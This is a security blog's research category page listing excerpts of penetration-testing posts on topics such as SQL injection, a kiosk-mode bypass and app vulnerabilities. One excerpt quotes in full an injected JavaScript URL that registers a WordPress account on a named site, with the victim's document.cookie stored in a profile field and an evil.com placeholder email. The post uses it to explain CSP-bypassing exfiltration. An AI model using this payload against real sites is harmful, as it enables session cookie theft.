Category: Research
-
Weird Web Series: Packing Data onto Your Browser

Welcome back to Post #2 of this Weird Web series. For those who found their way here outside of my LinkedIn, the idea is to explore unconventional (and occasionally rebellious) ways to use the internet. In this ‘episode’ we’re examining how most browsers provide (free) data storage and sync mechanisms – that you can exploit…
-
Weird Web Series: A Dynamic Website on S3?

During covid (as all good stories start) a good friend and I got very into making cocktails together over Facetime. We called it ‘Booze-day Tuesdays’, later simply Tuesdays. If we ever open a cocktail bar, that’s its name. Though, we quickly realised that tracking our mixology journey wasn’t a job for pen and paper… and…
-
Guided Access Mode Bypass
As a penetration tester who specialises in mobile apps, I get good visibility of how the enterprise is adopting/using/misusing various iOS capabilities and MDM features. One trend I’ve seen increasingly is the use of ‘Guided Access Mode’ to lock down devices. Guided-Access Mode (GAM), for the unfamiliar, locks the device into a single app. It’s…
-
Kinda LIKE SQL Injection
TLDR: This post is about some late-90s-level hacking. But the fact is that there just doesn’t exist a decent explanation of this vulnerability anywhere on the internet… and yesterday, in 2018, I found another application vulnerable to it (to quite serious effect). I’m afraid that was the straw that broke the camel’s back…
-
‘App Forgery’
In this (pretty long) post, I’m going to attempt to coin a name for an application vulnerability, most commonly found in mobile apps. This is “App Forgery”.
-
The Happn’ing
Years ago, one of the first posts I ever wrote was about my experience scripting a bot for the dating site OKCupid. It was just a PoC bashed together over a few beers with a friend. Since then (and becoming single) I’ve scripted bits and bobs for virtually every major dating site/app… it’s become a bit…
-
SQL Injection using System Variables in MySQL
For BSides Manchester 2015, the UK pen-testing company aptly named ‘Pentest Ltd’ held a SQL injection challenge where the injection point required structuring the payload in a specific manner with MySQL voodoo to keep the payload under 90 characters, and bypass a basic WAF. I was fairly certain the lab could also be accomplished using MySQL variables, but…
-
"Bypassing" CSP’s Data-Exfiltration Protections
A long time ago now, I tweeted a challenge to see if anyone knew what the following URL would attempt to do:

http://www.insta-mapper.com/google_map.php?device_id=1234';$.ajax({url:'/wp-login.php?action=register',type:'POST',data:"user_login='dr'&user_email='dr@evil.com'&gclient_id=&gredirect_uri=http://www.insta-mapper.com/&state_uri=http://www.insta-mapper.com&client_id=721352147882378&redirect_uri=http://www.insta-mapper.com&ws_plugin__s2member_registration=e4e7762e6a&ws_plugin__s2member_custom_reg_field_user_pass1='123456'&ws_plugin__s2member_custom_reg_field_user_pass2='123456'&ws_plugin__s2member_custom_reg_field_first_name='d'&ws_plugin__s2member_custom_reg_field_last_name='r'&ws_plugin__s2member_custom_reg_field_address_1='1'&ws_plugin__s2member_custom_reg_field_address_2=&ws_plugin__s2member_custom_reg_field_city=s&ws_plugin__s2member_custom_reg_field_country=u&ws_plugin__s2member_custom_reg_field_mobile_devices='"+encodeURI(document.cookie)+"'&ws_plugin__s2member_custom_reg_field_mobile_devices2=Apple&redirect_to=&wp-submit=Register"});var lol='a

Don’t worry, I don’t expect you to stare at that monstrosity. Instead I’ll just tell you. So a friend of mine was competing in WhiteHatRally last year, which is a sort…
-
Hunting bad regex with good regex.
In this post I’ll look at how a simple regex flaw I found on a web application led me down a pretty big exploratory hole of trying to search for regex vulnerabilities in applications… using regex; the results of which have since been useful on many of my engagements.